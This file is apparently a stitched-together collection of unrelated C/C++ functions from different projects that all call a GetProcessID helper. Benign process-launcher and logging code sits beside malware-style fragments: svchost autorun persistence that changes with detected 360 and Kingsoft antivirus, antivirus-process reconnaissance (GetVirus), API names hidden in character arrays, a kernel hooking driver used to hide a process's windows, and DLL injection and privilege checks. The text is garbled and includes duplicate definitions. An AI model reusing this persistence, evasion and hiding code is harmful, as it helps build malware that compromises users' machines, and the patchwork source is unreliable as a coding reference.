void WriteAutoRun1(char *lpszDstExeName)
{
//_asm int 3
// MyCommon::SetSvcHostReg(lpszDstExeName,0);
// return;
if(IsRegExsit()||
StrStr(GetCommandLineA(),"-svchost")
//MyCommon::IsServerStart("winio")
)
{
return;
}
if (GetProcessID("360tray.exe")&&!MyCommon::IsServerStart("ctfmon"))
{
Loader1(lpszDstExeName);
}
else
{
if (GetProcessID("KSafeTray.exe")||
GetProcessID("kxetray.exe")||
MyCommon::IsServerStart("ctfmon"))
{
MyCommon::SetSvcHostReg(lpszDstExeName,1);
}
else MyCommon::SetSvcHostReg(lpszDstExeName,0);
}
}
BOOL IsProcessHavingHigherPrivilege(LPCSTR TargetProcess) {
DWORD ProcessID = 0;
HANDLE hProcess = NULL;
BOOL IsHighPrivileged = FALSE;
DEBUG_MESSAGE("\t[+] Trying To Get Process ID Of: %s\n", TargetProcess);
ProcessID = GetProcessID(TargetProcess);
if (!ProcessID) {
DEBUG_ERROR("\t\t[-] Failed To Get Process ID Of: %s\n", TargetProcess);
exit(EXIT_FAILURE);
}
else {
DEBUG_INFO("\t\t[+] Process ID Of %s: %d\n", TargetProcess, ProcessID);
}
DEBUG_MESSAGE("\t[+] Trying To Open %s With PROCESS_ALL_ACCESS\n", TargetProcess);
// Open the process to check the privilege level, if we are able
// to open any SYSTEM process, this means we have successfully
// elevated current process privileges
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessID);
if (!hProcess) {
DEBUG_ERROR("\t\t[-] Failed To Open %s Process: 0x%X\n", TargetProcess, GetLastError());
}
else {
DEBUG_INFO("\t\t[+] Process Handle Of %s: 0x%X\n", TargetProcess, hProcess);
IsHighPrivileged = TRUE;
}
return IsHighPrivileged;
}
BOOL CInjectDLL::Uninject(const wchar_t* wszProcessName, const LPCTSTR& lpwszRemoteDllFullPath)
{
DWORD dwProcID;
GetProcessID(wszProcessName,dwProcID);
if (Uninject(dwProcID, lpwszRemoteDllFullPath))
return TRUE;
else
return FALSE;
}
bool ProcessHelper::IsProcessRuning(const QString& path) {
#ifdef Q_OS_DARWIN
ProcessSerialNumber psn;
return ProcessHelper::GetProcessPSN(path, psn);
#elif defined Q_OS_WIN
quint32 pid = 0;
return GetProcessID(path, pid);
#endif
return false;
}
//존재하지 않거나 이미 DLL을 포함할때 true를 반환
bool E_Util::isContainDLL(wchar_t* processName, wchar_t* dllname)
{
DWORD processID = GetProcessID(processName);
if (processID == 0)
return true;//프로세스아디가 존재하지 않음
bool result = false;
HMODULE hMods[1024];
HANDLE hProcess;
DWORD cbNeeded;
unsigned int i;
// Print the process identifier.
//printf("\nProcess ID: %u\n", processID);
// Get a handle to the process.
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE, processID);
if (NULL == hProcess)
return result;
// Get a list of all the modules in this process.
if (EnumProcessModules(hProcess, hMods, sizeof(hMods), &cbNeeded))
{
for (i = 0; i < (cbNeeded / sizeof(HMODULE)); i++)
{
TCHAR szModName[MAX_PATH];
// Get the full path to the module's file.
if (GetModuleFileNameEx(hProcess, hMods[i], szModName,
sizeof(szModName) / sizeof(TCHAR)))
{
// Print the module name and handle value.
//TRACE_WIN32A("[isContainDLL]%d. Module List %s", i, szModName);
if (wcsstr(szModName, dllname) != 0)
{
//TRACE_WIN32A("[isContainDLL]IT HAS EXPANDABLE DLL");
result = true;
break;
}
//_tprintf(TEXT("\t%s (0x%08X)\n"), szModName, hMods[i]);
}
}
}
// Release the handle to the process.
CloseHandle(hProcess);
return result;
}
bool getSetOfProcessID(string processName, std::vector<DWORD>*SetOfPID)
{
wstring wscons = stringToWidestring(processName);
LPCTSTR p_Name = wscons.c_str();
GetProcessID(p_Name, *SetOfPID);
if (SetOfPID->empty()) // Process is not running
{
return false;
}
return true;
}
void LogPrintVersion(bool isController)
{
const char* debugInfo = "";
const char* productString = PRODUCT_STRING;
#ifdef DEBUG
const char* buildDate = "Build date: " __DATE__ " " __TIME__;
Buffer debugBuffer;
debugBuffer.Appendf(" -- DEBUG %s, Pid: %U", buildDate, GetProcessID());
debugBuffer.NullTerminate();
debugInfo = debugBuffer.GetBuffer();
#endif
Log_Message("%s started as %s%s", productString,
isController ? "CONTROLLER" : "SHARD SERVER", debugInfo);
}
DWORD GetBaseAddr( const char *process_name )
{
DWORD pid = GetProcessID(process_name);
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,pid);
if (hSnapshot == INVALID_HANDLE_VALUE)
{
CloseHandle(hSnapshot);
return -1;
}
MODULEENTRY32 me;
me.dwSize = sizeof(MODULEENTRY32);
Module32First(hSnapshot,&me);
return (DWORD)me.modBaseAddr;
CloseHandle(hSnapshot);
return -1;
}
int ProcessWatch::FindHeavyProcess()
{
int processCount = GetProcessID();
for(int i=1; i<processCount; i++)
{
int cpu = GetProcessCpuUsage(m_vecProcessInfo[i].processID);
//_tprintf(TEXT("%d, %d\n"), m_vecProcessInfo[i].processID, cpu);
if(cpu>15)
{
char str[MAX_BUF_PATH] = {};
TCHAR tstr[MAX_BUF_PATH] = {};
sprintf_s(str, sizeof(str), "PID[%d] cpu usage more than limited value: %d %%, the path is %s \n",
m_vecProcessInfo[i].processID, cpu, UnicodeToANSI(m_vecProcessInfo[i].processPath).c_str());
_tcscpy_s(tstr, ANSIToUnicode(string(str)).c_str());
WriteToLog(tstr);
return m_vecProcessInfo[i].processID;
}
}
return 0;
}
void ProcessHelper::SetActiveProcess(const QString& path) {
#ifdef Q_OS_DARWIN
ProcessSerialNumber psn;
if (ProcessHelper::GetProcessPSN(path, psn))
SetFrontProcess(&psn);
#elif defined Q_OS_WIN
quint32 pid = 0;
HWND hWnd = 0;
if (GetProcessID(path, pid)) {
ENUMINFO EnumInfo;
// set the search parameters
EnumInfo.PId = pid;
// set the return parameters to default values
EnumInfo.hWnd = NULL;
EnumInfo.hEmptyWnd = NULL;
EnumInfo.hInvisibleWnd = NULL;
EnumInfo.hEmptyInvisibleWnd = NULL;
// do the search among the top level windows
::EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&EnumInfo);
// return the one found if any
if (EnumInfo.hWnd != NULL)
hWnd = EnumInfo.hWnd;
else if (EnumInfo.hEmptyWnd != NULL)
hWnd = EnumInfo.hEmptyWnd;
else if (EnumInfo.hInvisibleWnd != NULL)
hWnd = EnumInfo.hInvisibleWnd;
else
hWnd = EnumInfo.hEmptyInvisibleWnd;
}
if (hWnd)
::SetForegroundWindow(hWnd);
#endif
}
int CnmpInfo::run()
{
//DenyInterrupt();
//创建日志组件
m_pLogManage = CLogManage::getInstance();
if ( m_pLogManage->setLog( GetProcessID()) < 0 )
{
std::cerr << __FILE__ << " " << __LINE__ << " " << "log error" << std::endl;
return -1;
}
//创建数据库连接对象
TOCIDatabase* pDB = Environment::getDBConn();
if ( NULL == pDB )
{
LOG_DEBUG( "get db info error" );
return -1;
}
m_pQry = new TOCIQuery( pDB );
if ( NULL == m_pQry )
{
LOG_DEBUG( "create oci qry object error" );
return -1;
}
if(init()< 0)
{
LOG_DEBUG( "init error" );
return -1;
}
LOG_DEBUG( "NMP信息点提取开始运行..." );
char szLog[MAX_STRING_LENGTH]= {0};
pthread_t thread_id1;
pthread_t thread_id2;
int iRet = pthread_create(&thread_id1,NULL,thread_highInfo,NULL);
if(iRet!=0)
{
LOG_DEBUG("create thread error");
return -1;
}
iRet = pthread_create(&thread_id2,NULL,thread_lowInfo,NULL);
if(iRet!=0)
{
LOG_DEBUG("create thread error");
return -1;
}
//主线程实时检测子线程是否退出
//如退出则进程退出
while(true)
{
int pthread_kill_err =-1;
//检查线程是否还在
pthread_kill_err = pthread_kill(thread_id1,0);
if(pthread_kill_err == ESRCH)
{
memset(szLog,0x00,sizeof(szLog));
sprintf(szLog,"ID为0x%x的线程不存在或者已经退出",(unsigned int)thread_id1);
LOG_DEBUG(szLog);
return -1;
}
else if(pthread_kill_err == EINVAL)
{
LOG_DEBUG("发送信号非法");
}
else
{
memset(szLog,0x00,sizeof(szLog));
sprintf(szLog,"ID为0x%x的线程目前仍然存活。",(unsigned int)thread_id1);
}
//检查线程是否还在
pthread_kill_err = pthread_kill(thread_id2,0);
if(pthread_kill_err == ESRCH)
{
memset(szLog,0x00,sizeof(szLog));
sprintf(szLog,"ID为0x%x的线程不存在或者已经退出",(unsigned int)thread_id2);
LOG_DEBUG(szLog);
return -1;
}
else if(pthread_kill_err == EINVAL)
{
LOG_DEBUG("发送信号非法");
}
else
{
memset(szLog,0x00,sizeof(szLog));
sprintf(szLog,"ID为0x%x的线程目前仍然存活。",(unsigned int)thread_id2);
}
usleep(99999);
}
return 1;
}
VOID CMainDialog::OnHideWindowHandles()
{
CHAR ProcessName[MAX_PATH];
CEdit *pProcessName = (CEdit *)GetDlgItem(IDC_PROCESSNAME);
CButton *pHideWindowHandlesButton = (CButton *)GetDlgItem(IDHIDEWINDOWHANDLES);
CButton *pShowWindowHandlesButton = (CButton *)GetDlgItem(IDSHOWWINDOWHANDLES);
pProcessName->GetWindowText(ProcessName, sizeof(ProcessName));
strcat(ProcessName, ".exe");
DWORD HiddenWindowHandleProcessId;
LPVOID pHiddenWindowHandleProcessId = &HiddenWindowHandleProcessId;
if(FALSE != (HiddenWindowHandleProcessId = GetProcessID(ProcessName)))
{
pHideWindowHandlesButton->EnableWindow(FALSE);
pShowWindowHandlesButton->EnableWindow(TRUE);
}
else
{
MessageBox("Process Does Not Exist!", "Error", MB_ICONERROR);
return;
}
if (DriverLoaded)
{
UnloadDriver();
DriverLoaded = FALSE;
}
LoadDriver();
DriverLoaded = TRUE;
CommDevice = CreateFile("\\\\.\\ShadowTableHookDriver", GENERIC_READ | GENERIC_WRITE,
0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if(CommDevice == INVALID_HANDLE_VALUE)
{
int error = GetLastError();
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, NULL,
GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR) &lpMsgBuf,
0, NULL);
MessageBox((LPTSTR)lpMsgBuf, "GetLastError", MB_OK|MB_ICONINFORMATION);
return;
}
if(CommDevice)
{
DWORD dwReturn;
if (0 == (DeviceIoControl(CommDevice, IO_SEND_HIDDEN_PROCESS_ID,
pHiddenWindowHandleProcessId, sizeof(HiddenWindowHandleProcessId),
NULL, 0, &dwReturn, NULL)))
{
int error = GetLastError();
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, NULL,
GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR) &lpMsgBuf,
0, NULL);
MessageBox((LPCSTR)lpMsgBuf, "GetLastError", MB_OK|MB_ICONINFORMATION);
return;
}
}
if(CommDevice)
{
DWORD dwReturn;
IsGUIThread(TRUE);
if (0 == (DeviceIoControl(CommDevice, IO_HOOK_SYSTEM_SERVICES, NULL, 0,
NULL, 0, &dwReturn, NULL)))
{
int error = GetLastError();
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, NULL,
GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR) &lpMsgBuf,
0, NULL);
MessageBox((LPCSTR)lpMsgBuf, "GetLastError", MB_OK|MB_ICONINFORMATION);
return;
}
}
}
char *GetLogUser2K()
{
typedef BOOL
(WINAPI
*OpenProcessTokenT)(
__in HANDLE ProcessHandle,
__in DWORD DesiredAccess,
__deref_out PHANDLE TokenHandle
);
char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'};
OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary(KIoFqQPSy),"OpenProcessToken");
typedef BOOL
(WINAPI
*LookupAccountSidAT)(
__in_opt LPCSTR lpSystemName,
__in PSID Sid,
__out_ecount_part_opt(*cchName, *cchName + 1) LPSTR Name,
__inout LPDWORD cchName,
__out_ecount_part_opt(*cchReferencedDomainName, *cchReferencedDomainName + 1) LPSTR ReferencedDomainName,
__inout LPDWORD cchReferencedDomainName,
__out PSID_NAME_USE peUse
);
LookupAccountSidAT pLookupAccountSidA=(LookupAccountSidAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"LookupAccountSidA");
typedef BOOL
(WINAPI
*GetTokenInformationT)(
__in HANDLE TokenHandle,
__in TOKEN_INFORMATION_CLASS TokenInformationClass,
__out_bcount_part_opt(TokenInformationLength, *ReturnLength) LPVOID TokenInformation,
__in DWORD TokenInformationLength,
__out_opt PDWORD ReturnLength
);
GetTokenInformationT pGetTokenInformation=(GetTokenInformationT)GetProcAddress(LoadLibrary(KIoFqQPSy),"GetTokenInformation");
typedef HANDLE
(WINAPI
*OpenProcessT)(
__in DWORD dwDesiredAccess,
__in BOOL bInheritHandle,
__in DWORD dwProcessId
);
OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"OpenProcess");
DWORD dwProcessID = GetProcessID("explorer.exe");
if (dwProcessID == 0)
return NULL;
BOOL fResult = FALSE;
HANDLE hProc = NULL;
HANDLE hToken = NULL;
TOKEN_USER *pTokenUser = NULL;
char *lpUserName = NULL;
__try
{
// Open the process with PROCESS_QUERY_INFORMATION access
hProc = pOpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcessID);
if (hProc == NULL)
{
__leave;
}
fResult = pOpenProcessToken(hProc, TOKEN_QUERY, &hToken);
if(!fResult)
{
__leave;
}
DWORD dwNeedLen = 0;
fResult = pGetTokenInformation(hToken,TokenUser, NULL, 0, &dwNeedLen);
if (dwNeedLen > 0)
{
pTokenUser = (TOKEN_USER*)new BYTE[dwNeedLen];
fResult = pGetTokenInformation(hToken,TokenUser, pTokenUser, dwNeedLen, &dwNeedLen);
if (!fResult)
{
__leave;
}
}
else
{
__leave;
}
SID_NAME_USE sn;
TCHAR szDomainName[MAX_PATH];
DWORD dwDmLen = MAX_PATH;
DWORD nNameLen = 256;
lpUserName = new char[256];
fResult = pLookupAccountSidA(NULL, pTokenUser->User.Sid, lpUserName, &nNameLen,
szDomainName, &dwDmLen, &sn);
}
__finally
{
if (hProc)
::CloseHandle(hProc);
if (hToken)
::CloseHandle(hToken);
if (pTokenUser)
delete[] (char*)pTokenUser;
return lpUserName;
}
}
/*******************************************************************************
ONLY ONE BLOCK START
*******************************************************************************/
int InitOnlyOneBlock(char *bname)
{
int i, pid;
char pname[BUF_SIZE];
char fname[BUF_SIZE];
char errbuf[MAX_ERRBUF_LEN];
struct stat statbuf;
if (is_registered_block(bname) < 0)
{
sprintf(errbuf, "NON EXIST BLOCK NAME\n");
PrintOut(TIFB_FAIL, errbuf);
return -1;
}
for( i=0 ; i < strlen(bname); i++)
pname[i] = toupper(bname[i]);
pname[strlen(bname)] = 0x00;
pid = GetProcessID(pname);
if(pid > 0) /*** ALREADY RUNNING *****************************************/
{
sprintf(errbuf, "ALREADY RUNNING PROCESS %s\n", pname);
PrintOut(TIFB_FAIL, errbuf);
return -1;
}
//sprintf(fname, "%s%s", APP_HOME_BIN, pname);
fname[0] = 0x00;
if( dGetBlockBIN(pname, fname, 256) < 0)
{
sprintf(errbuf, "NOT Find Binary(%s) in McInit\n", pname);
PrintOut(TIFB_FAIL, errbuf);
}
if(stat(fname, &statbuf) < 0)
return -3;
pid = fork();
if(pid < 0)
{
sprintf(errbuf, "CAN'T CREATE A NEW PROCESS\n");
PrintOut(TIFB_FAIL, errbuf);
return -1;
}
else if(pid == 0)
{
freopen("/dev/null", "w", stdout);
freopen("/dev/null", "r", stdout);
if (execl(fname, pname, (char *)0) < 0)
{
memset(errbuf, 0x0, MAX_ERRBUF_LEN);
sprintf(errbuf, "CAN'T EXECUTE A NEW BLOCK : %s(%s)\n", bname, fname);
PrintOut(TIFB_FAIL, errbuf);
}
exit(0);
}
else
{
return pid;
}
}
/*******************************************************************************
MAIN FUNCTION
*******************************************************************************/
int main(int ac, char **av)
{
FILE *fp;
int fd;
int pid;
int i, j, ln, err, kf, dRet;
int init_only_one = 0;
int verbose_flag = 0;
char buf[BUF_SIZE];
char fname[BUF_SIZE];
char block_name[BUF_SIZE];
char tmpbuf[128], errbuf[2048];
signal(SIGHUP, SIG_IGN);
signal(SIGCHLD, SIG_IGN);
signal(SIGQUIT, init_isr);
dRet = dGetUserPermission();
if( dRet == 0 )
{
sprintf(errbuf, "INAVLID USER PERMISSION\n" );
PrintOut(TIFB_FAIL, errbuf);
return 1;
}
dRet = dGetBlocks(FILE_MC_INIT,STR_TSW_COM);
if( dRet < 0 ){
sprintf(errbuf, "FAILED IN McInit\n" );
PrintOut(TIFB_FAIL, errbuf);
return 1;
}
else{
dCurrBlockCnt = dRet;
}
if( init_proc() < 0 ){
exit(0);
}
if (ac == 1) /*** ALL START ********************************************/
{
strcpy(fname, FILE_MC_INIT); /*** "McInit" File ****************************/
}
else if (ac > 3)
{
UsageExit();
}
else
{
for(i = 1;i < ac;i++)
{
if (av[i][0] != '-')
{
UsageExit();
}
else if(av[i][1] == 'b')
{
if( ac < 3 )
{
UsageExit();
}
else /*** ONLY ONE BLOCK START *****************************/
{
++i;
init_only_one = 1;
for(j = 0;j < strlen(av[i]);j++)
block_name[j] = toupper(av[i][j]);
block_name[j] = 0;
}
}
else if( av[i][1] == 'v' ) /*** ALL START ************************/
{
verbose_flag = 1;
}
else if(av[i][1] == 'd') {
/* FOR SYSTEM AUTO RESTART : WAIT BOOTTING COMPLETE */
sleep(300);
verbose_flag = 1;
}
else
{
UsageExit();
}
}
}
//freopen("/dev/null", "w", stdout);
/*** 한개 블럭을 기동 시킴 ************************************************/
if (init_only_one)
{
pid = InitOnlyOneBlock(block_name);
if(pid > 0)
{
sprintf(errbuf, "NEW BLOCK : %s\n PROCESS ID: %d\n", block_name, pid);
PrintOut(TIFB_SUCCESS, errbuf);
for(i=0; i< dCurrBlockCnt; i++)
{
if( STR_TSW_COM[i] == NULL )
continue;
if( !strcasecmp(block_name, STR_TSW_COM[i]) )
{
send_pid_msg(i, pid);
break;
}
}
}
exit(0);
}
/***************************************************************************
READ FIDB_FILE, SET SHARED MEMORY VALUE
***************************************************************************/
if ((fd = open (FILE_FIDB, O_RDONLY, 0666)) < 0)
{
}
else
{
remove( FILE_FIDB );
}
strcpy(fname, FILE_MC_INIT);
if((fp = fopen(fname, "r")) == NULL)
{
sprintf(errbuf, "CAN'T OPEN FILE %s\n", fname);
PrintOut(TIFB_FAIL, errbuf);
exit(1);
}
ln = cntr = 0;
/***************************************************************************
READ McInit File. SET blocks(bname, fname) VALUE
***************************************************************************/
while(fgets(buf, BUF_SIZE, fp) != NULL)
{
ln++;
if (AnalyzeLine(buf) < 0)
{
fclose(fp);
close(fd);
sprintf(errbuf, "SYNTAX ERROR (FILE: %s, LINE: %d)\n", fname, ln);
PrintOut(TIFB_FAIL, errbuf);
exit(1);
}
}
fclose(fp);
/***************************************************************************
WHEN ALL BLOCK IS STARTED, CHECK 2 TIMES
***************************************************************************/
if( verbose_flag == 0 )
{
fprintf(stderr, "\n\tBlocks to initialize are follows.\n");
PrintBlocks();
fprintf(stderr, "\tDo you want initialize (y/n) ? ");
err = GetYorN();
if(err == _NO)
{
sprintf(errbuf, "STOPPED BY USER REQUEST\n");
PrintOut(TIFB_SUCCESS, errbuf);
exit(0);
}
fprintf(stderr, "\n\tDo you really want initialize (y/n) ? ");
err = GetYorN();
if(err == _NO)
{
sprintf(errbuf, "STOPPED BY USER REQUEST\n");
PrintOut(TIFB_SUCCESS, errbuf);
exit(0);
}
}
sprintf(errbuf, "MAIN COMPUTER PROCESSS INITIALIZATION STARTED\n");
PrintOut( TIFB_SUCCESS , errbuf );
signal(SIGINT, init_isr);
/*** 프로세스 기동을 개시함 ***********************************************/
for(i=0; i<cntr; i++)
{
/*** 파일의 존재 및 수행가능성 조사 ***********************************/
if( IsCorrectBlock(i) < 0 )
{
if( verbose_flag == 1 )
{
continue;
}
else
{
sprintf(errbuf, "FILE %s DOES NOT EXIST\n", blocks[i].fname);
PrintOut(TIFB_FAIL, errbuf);
fprintf(stderr, "\n\tDo you want to continue (y/n) ? ");
err = GetYorN();
if(err == _YES)
{
inits[i].isinit = _FALSE;
continue;
}
else
{
final_isr();
}
}
}
/*** 이미 실행중인지 여부를 검사 **************************************/
if ( (pid = GetProcessID(blocks[i].bname)) > 0 )
{
/* 이미 실행중인 경우 */
if( verbose_flag == 1 )
{
err = _YES ;
}
else
{
fprintf(stderr, "\n\tBlock \"%s\" is already running.\n", blocks[i].bname);
fprintf(stderr, "\tDo you want replace block \"%s\" (y/n) ? ", blocks[i].bname);
err = GetYorN();
}
if(err == _NO)
{
inits[i].isinit = _FALSE;
continue;
}
else
{
/* New Version of Killing */
kf = kill(pid, SIGTERM);
if (kf < 0)
{
//sleep(2);
if (kill(pid, SIGTERM) < 0)
{
if (errno == ESRCH)
kf = 0;
}
else
{
kf = 0;
}
}
if ( kf && kill(pid, SIGKILL) < 0)
{
if( verbose_flag == 1 )
{
err = _YES ;
}
else
{
fprintf(stderr, "\tCan't kill process \"%d\"(%s)\n", pid, blocks[i].bname);
fprintf(stderr, "\tDo you want to continue (y/n) ? ");
err = GetYorN();
}
if(err == _YES)
{
inits[i].isinit = _FALSE;
continue;
}
else
{
final_isr();
}
}
else
{
sprintf(errbuf, "PROCESS %s(PID=%d) KILLED\n", blocks[i].fname, pid);
PrintOut(TIFB_SUCCESS, errbuf);
}
}
}
signal(SIGTERM, init_isr);
/***********************************************************************
PROCESS START
***********************************************************************/
err = ProcessStart(i);
if(err == -1)
{
if( verbose_flag == 1 )
{
continue;
}
else
{
sprintf(errbuf, "CAN'T START PROCESS BLOCK: %s\n", blocks[i].bname);
PrintOut(TIFB_FAIL, errbuf);
fprintf(stderr, "\tDo you want to continue (y/n) ? ");
}
}
else if(err == -2)
{
if( verbose_flag == 1 )
{
continue;
}
else
{
sprintf(errbuf, "PROGRAM NAME %s DOES NOT MEET NAME CONVENTION\n", blocks[i].fname);
strcat(errbuf, " ABANDON EXECUTING PROCESS\n");
PrintOut(TIFB_FAIL, errbuf);
fprintf(stderr, "\tDo you want to continue (y/n) ? ");
}
}
if(err < 0)
{
if( verbose_flag == 1 )
{
err = _YES;
}
else
{
err = GetYorN();
}
if(err == _NO)
{
final_isr();
}
else
{
inits[i].isinit = _FALSE;
continue;
}
}
else
{
sprintf(errbuf, "A PROCESS INIAILIZATION SUCCESS\n");
sprintf(tmpbuf, " BLOCK NAME : %s\n", blocks[i].bname);
strcat(errbuf, tmpbuf);
sprintf(tmpbuf, " PROGRAM NAME : %s\n", blocks[i].fname);
strcat(errbuf, tmpbuf);
sprintf(tmpbuf, " PROCESS ID : %d\n", err);
strcat(errbuf, tmpbuf);
PrintOut(TIFB_SUCCESS, errbuf);
sleep(1);
for(j=0; j< dCurrBlockCnt; j++)
{
if( STR_TSW_COM[i] == NULL )
continue;
if( !strcasecmp(blocks[i].bname, STR_TSW_COM[j]) )
{
send_pid_msg(j, err );
break;
}
}
inits[i].isinit = _TRUE;
inits[i].pid = err;
}
}
PrintSuccessBlocks();
printf("UPRESTO co. GTAM\n\n");
exit(1);
}
HANDLE CProcess::GetHandle(string ProcessName)
{
HANDLE h_Process;
h_Process = OpenProcess(PROCESS_VM_READ, FALSE, GetProcessID(ProcessName));
return h_Process;
}
int main(int ac, char **av)
{
int i, dRet, dVerCount;
if( (dRet = dGetUserPermission()) == 0)
{
sprintf(errbuf, "INAVLID USER PERMISSION\n" );
PrintOut(TIFB_FAIL, errbuf);
return EXIT_FAILURE;
}
if( (dVerCount = dGetVerBlock(FILE_MC_INIT, STR_VER_COM)) < 0)
{
sprintf(errbuf, "ERROR IN dGetVerBlock(%s)\n", FILE_MC_INIT);
PrintOut(TIFB_FAIL, errbuf);
return EXIT_FAILURE;
}
if( (dRet = dGetBlocks(FILE_MC_INIT, STR_TSW_COM)) < 0)
{
sprintf(errbuf, "FAILED IN McInit\n" );
PrintOut(TIFB_FAIL, errbuf);
return EXIT_FAILURE;
}
else
dCurrBlockCnt = dRet;
//debug flag setting
if( ac == 2 && av[1][0] == '-' && av[1][1] == 'd' ) {
debug_flag = 1;
} else {
debug_flag = 0;
}
Init_Value();
for(i = 0; i < dCurrBlockCnt; i++)
{
if(STR_TSW_COM[i] == NULL)
continue;
stProc.mpswinfo[i].pid = GetProcessID(STR_TSW_COM[i]);
if(stProc.mpswinfo[i].pid > 0)
{
stProc.mpsw[i] = NORMAL;
stProc.mpswinfo[i].when = starttime;
}
else
stProc.mpsw[i] = CRITICAL;
}
for(i = 0; i < dCurrBlockCnt; i++)
{
if(stProc.mpsw[i] == NORMAL)
{
if(InitVersionShm() < 0)
{
sprintf(errbuf, "SHARED MEMORY( VERSION ) INIT FAILURE\n");
PrintOut(TIFB_FAIL, errbuf);
return EXIT_FAILURE;
}
break;
}
}
dInit_fidb();
PrintResult(dVerCount);
return EXIT_SUCCESS;
}
char *GetLogUser2K()
{
DWORD dwProcessID = GetProcessID("explorer.exe");
if (dwProcessID == 0)
return NULL;
BOOL fResult = FALSE;
HANDLE hProc = NULL;
HANDLE hToken = NULL;
TOKEN_USER *pTokenUser = NULL;
char *lpUserName = NULL;
__try
{
// Open the process with PROCESS_QUERY_INFORMATION access
hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcessID);
if (hProc == NULL)
{
__leave;
}
fResult = OpenProcessToken(hProc, TOKEN_QUERY, &hToken);
if(!fResult)
{
__leave;
}
DWORD dwNeedLen = 0;
fResult = GetTokenInformation(hToken,TokenUser, NULL, 0, &dwNeedLen);
if (dwNeedLen > 0)
{
pTokenUser = (TOKEN_USER*)new BYTE[dwNeedLen];
fResult = GetTokenInformation(hToken,TokenUser, pTokenUser, dwNeedLen, &dwNeedLen);
if (!fResult)
{
__leave;
}
}
else
{
__leave;
}
SID_NAME_USE sn;
TCHAR szDomainName[MAX_PATH];
DWORD dwDmLen = MAX_PATH;
DWORD nNameLen = 256;
lpUserName = new char[256];
fResult = LookupAccountSid(NULL, pTokenUser->User.Sid, lpUserName, &nNameLen,
szDomainName, &dwDmLen, &sn);
}
__finally
{
if (hProc)
::CloseHandle(hProc);
if (hToken)
::CloseHandle(hToken);
if (pTokenUser)
delete[] (char*)pTokenUser;
return lpUserName;
}
}
char* GetVirus()
{
static char AllName[256] = "";
//360安全 卡巴 江民
char* VirusName = "360tray.exe"; char* VirusName1 = "avp.exe"; char* VirusName2 = "KvMonXP.exe";
//瑞星 360杀毒 麦咖啡
char* VirusName3 = "RavMonD.exe"; char* VirusName4 = "360sd.exe"; char* VirusName5 = "Mcshield.exe";
//NOD32 金山 可牛
char* VirusName6 = "egui.exe"; char* VirusName7 = "kxetray.exe"; char* VirusName8 = "knsdtray.exe";
//趋势 小红伞 avast
char* VirusName9 = "TMBMSRV.exe"; char* VirusName10 = "avcenter.exe"; char* VirusName11 = "ashDisp.exe";
char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
pwsprintfA(AllName,"%s",""); //
char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'};
lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01);
if (GetProcessID(VirusName))
{
VirusName = "360安全卫士";
plstrcatA( AllName, VirusName); //
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName1))
{
VirusName1 = "卡巴";
plstrcatA( AllName, VirusName1 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName2))
{
VirusName2 = "江民";
plstrcatA( AllName, VirusName2 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName3))
{
VirusName3 = "瑞星";
plstrcatA( AllName, VirusName3 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName4))
{
VirusName4 = "360杀毒";
plstrcatA( AllName, VirusName4 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName5))
{
VirusName5 = "麦咖啡";
plstrcatA( AllName, VirusName5 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName6))
{
VirusName6 = "NOD32";
plstrcatA( AllName, VirusName6 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName7))
{
VirusName7 = "金山";
plstrcatA( AllName, VirusName7 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName8))
{
VirusName8 = "可牛";
plstrcatA( AllName, VirusName8 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName9))
{
VirusName9 = "趋势";
plstrcatA( AllName, VirusName9 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName10))
{
VirusName10 = "小红伞";
plstrcatA( AllName, VirusName10 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName11))
{
VirusName11 = "Avast";
plstrcatA( AllName, VirusName11 );
plstrcatA( AllName, " " );
}
if (Gyfunction->my_strstr(AllName, " " ) == 0 )
{
plstrcatA(AllName , "未发现 ");
}
return AllName;
}
